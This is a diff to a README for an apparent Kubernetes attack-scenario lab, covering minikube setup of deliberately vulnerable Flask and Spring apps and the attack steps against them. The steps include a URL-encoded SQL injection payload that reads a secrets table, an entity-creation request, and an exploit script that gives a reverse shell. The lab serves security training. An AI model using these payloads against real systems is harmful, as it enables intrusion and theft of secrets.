HasanYldz/kubernetes-attack-scenarios/scenario_4_spring_rce/README.md

 ### Steps to Reproduce

 ## Setup
-1- `minikube start`
+1- `minikube start` \
-2- In FlaskVulnerableFrontEnd/kube run `kubectl apply -f vulnerable-frontend-deployment.yaml`
+2- In FlaskVulnerableFrontEnd/kube run `kubectl apply -f vulnerable-frontend-deployment.yaml` \
-3- In SpringBreakVulnerableApp/kube run `kubectl apply -f springbreak-vulnerable-app-deployment.yaml`
+3- In SpringBreakVulnerableApp/kube run `kubectl apply -f springbreak-vulnerable-app-deployment.yaml` \
 4- Port-forwar both of them with `kubectl port-forward pods/springbreak-vulnerable-app.....
 8090:8090` and `kubectl port-forward pods/vulnerable-frontend-....
-5000:5000`
+5000:5000` \

 ## Attack
-1- First the attacker uses SQL Injection to the frontend with known ip and port with `curl "http://localhost:5000/search?query='%20UNION%20SELECT%20id,%20secret_info%20AS%20info%20FROM%20secrets%20--"` and finds the internet endpoint of the backend server.
+1- First the attacker uses SQL Injection to the frontend with known ip and port with `curl "http://localhost:5000/search?query='%20UNION%20SELECT%20id,%20secret_info%20AS%20info%20FROM%20secrets%20--"` and finds the internet endpoint of the backend server. \
+2- Create the attack entity with `curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://localhost:8090/entity` \
-2- Then with this knowledge attacker runs the exploit.py, `python exploit.py --ip <ip from injection> --port <port from injection>`
+3- Then with this knowledge attacker runs the exploit.py, `python exploit.py --ip <ip from injection> --port <port from injection>` \
-3- Attacker has connected a pseudo reverse shell.
+4- Attacker has connected a pseudo reverse shell. \